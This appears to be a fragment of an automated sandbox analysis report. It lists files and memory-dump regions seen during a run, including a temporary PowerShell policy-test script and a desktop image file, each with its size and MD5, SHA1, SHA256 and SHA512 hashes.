SHA117b23ae0e6a11d5b8159c748073e36a936f3316a
SHA25610ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA51264b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zpdunt3m.nho.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\Desktop\kill.jpgFilesize
498KB
MD5880e51ca9da8406fd0648c3016ee5034
SHA112591660e44431b0f38224df8b5529f8c2589693
SHA256fb7f87e9b4e33a1be7d67415f59c10b0436f7404c619157e0bce0ea7fa86e99e
SHA5124a05412ed27086c602ebaa280564d9e60121fa5f758987285c3250789f7b197673cda0d22d2e66f9c5acacf9364fdeb076fc1d5fa28bee9bcc22454500304dcb
-
\??\pipe\LOCAL\crashpad_3484_FRSECRQNEBZGJZSUMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/2764-582-0x000002BB69390000-0x000002BB693C5000-memory.dmpFilesize
212KB
-
memory/3596-554-0x000001786A290000-0x000001786A2C5000-memory.dmpFilesize
212KB
-
memory/5004-223-0x00007FFF95C00000-0x00007FFF966C2000-memory.dmpFilesize
10.8MB
-
memory/5004-224-0x00007FFF95C00000-0x00007FFF966C2000-memory.dmpFilesize
10.8MB
-
memory/5004-225-0x00007FFF95C00000-0x00007FFF966C2000-memory.dmpFilesize
10.8MB
-
memory/5004-228-0x00007FFF95C00000-0x00007FFF966C2000-memory.dmpFilesize
10.8MB
-
memory/5004-212-0x00007FFF95C03000-0x00007FFF95C05000-memory.dmpFilesize
8KB
-
memory/5004-222-0x00007FFF95C00000-0x00007FFF966C2000-memory.dmpFilesize
10.8MB
-
memory/5004-221-0x000002334CFA0000-0x000002334CFC2000-memory.dmpFilesize
136KB